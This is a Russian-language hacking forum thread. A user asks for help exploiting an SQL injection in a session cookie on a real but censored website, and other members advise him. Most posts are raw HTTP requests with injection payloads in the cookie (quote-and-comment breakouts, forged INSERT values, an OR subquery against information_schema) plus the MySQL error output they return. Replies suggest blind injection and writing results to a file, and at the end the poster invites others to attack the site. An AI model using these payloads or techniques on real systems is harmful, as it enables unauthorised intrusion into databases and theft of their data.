Вопрос по sql-inj в кукисах

Нашёл скул на сайте в куках. подставляем ковычку - выдает ошибку. Пробую раскрутить, а сервер каким-то макаром по-разному отвечает на изменения в запросе...Например, получается так:

Первый запрос

Code:

[COLOR=Sienna]GET http://<ЦЕНЗУРА>/ HTTP/1.0
Accept: */*
Accept-Language: ru
Host: <ЦЕНЗУРА>
Pragma: no-cache
Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12'/*[/COLOR]

error near чета-там...
[COLOR=SlateGray]INSERT INTO online (uid, par2, lastdate, location, useragent, ip, proxy ) VALUES(0, 'n0u21994ig02q51f6ka36vgk12' and 1=0/*', 1198519416, '%mainpage%', '', '85.214.66.61', '85.214.66.61')[/COLOR]

Соответственно, я пытаюсь собственноручно заполнить INSERT и получается вот что:

Code:

[COLOR=Sienna]GET http://<ЦЕНЗУРА>/ HTTP/1.0
Accept: */*
Accept-Language: ru
Host: <ЦЕНЗУРА>
Pragma: no-cache
Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '' , '1.1.1.1', '1.1.1.1')/*[/COLOR]

error near чета-там...
[COLOR=SlateGray]SELECT COUNT(*) as count FROM online WHERE par2='n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '' , '1.1.1.1', '1.1.1.1')/*[/COLOR][/

Так и получается, что я пытаюсь сделать правильный на мой взгляд запрос, а сервес сцуко, каким-то макаром меняет ответ когда не надо >:0

В чем проблема?

 

По моему дело в пробелах. В запросах пробелы надо урлэнкодить. Попробуй их просто избежать

 

Macro, хм..счас попробую...
А пока вот эти 2 запроса меня больше всего настораживают =)

Code:

[COLOR=Sienna]GET http://<censored>/ HTTP/1.0
Accept: */*
Accept-Language: ru
User-Agent: 123
Host: <censored>
Pragma: no-cache
Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12'/*, 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*[/COLOR]

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')/*, 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*'' at line 1
Error Number:1064
[COLOR=SlateGray]INSERT INTO online (uid, session, lastdate, location, useragent, ip, proxy ) VALUES(0, 'n0u21994ig02q51f6ka36vgk12'/*, 1198519416, '%mainpage%', 'm' , '1.1.1.1', '1.1.1.1')/*', 1198521938, '%mainpage%', '123', '128.197.11.30', '128.197.11.30')[/COLOR]




[COLOR=Sienna]GET http://<censored>/ HTTP/1.0
Accept: */*
Accept-Language: ru
User-Agent: 123
Host: <censored>
Pragma: no-cache
Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*[/COLOR]

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*'' at line 1
Error Number:1064
[COLOR=SlateGray]SELECT COUNT(*) as count FROM online WHERE session='n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*[/COLOR]

 

ну а что тут непонятно?

есть два запроса, один INSERT другой SELECT
есть переменная par2, которая используется в первом и во втором запросе
второй твой пример показывает, что первый запрос прошел успешно
т.к. после подстановки твоих значений из par2 в INSERT они корректные именно для INSERT, но не для SELECT, второй запрос выдает ошибку... у меня сейчас башка не варит, но я думаю, что из запроса SELECT ты ничего вынешь (не получится) т.к. сначала идет INSERT и в случае неккоректности выкидывает ошибку, и данные из par2 в SELECT не поступают, почитай статью Elekt`a там написано про BLIND-inj, может получится что нить из этого получить

 

Macro,дело не в пробелах
Вот ещё, что заметил...par2-это сессия. После того, как мне на сайте "завели" сессию, то пока она жива, корректно выполняется запрос:

Code:

[COLOR=Sienna]
GET http://<CENSORED>/ HTTP/1.0
Accept: */*
Accept-Language: ru
User-Agent: m
Host: <CENSORED>
Pragma: no-cache
Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=rih9c1888t9kormjhuvsf537d4' or 1=(select 1 from information_schema.tables limit 1 offset 1)/*
[/COLOR]

Как сессия "умирает", запрос становится некорректен. Кроме блайнда что-нибудь здесь светит? Ещё пробвал вывести данные в файл, но папку на запись не нашёл

 

Кстати, скобка в этом запросе лишняя

Надо

Code:

GET http://<censored>/ HTTP/1.0
Accept: */*
Accept-Language: ru
User-Agent: 123
Host: <censored>
Pragma: no-cache
Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1'/*

 

Macro, она была бы верно поставлена, если б сервер ответил так, как я ожидал

 

Совет #1 Никогда ничего не предвосхищай
А вообще, так тут тебе вряд ли сильно помогут, линк в студию или пиши кому-нить знакомому в пм.

 

скобка нужна для Insert

 

Macro, хост не хочу палить, там ресурс полезный =)

 

Думаю Scipio прав, вряд ли тут выдет чего кроме blind sql inj

 

Видео сниму, если получится чего...

 

+1 так и есть. Спасибо.

Будем дальше капать....

 

Сдаюсь...Если кому интересно попробовать силы, стучитесь 87дивятко403восьмёрко...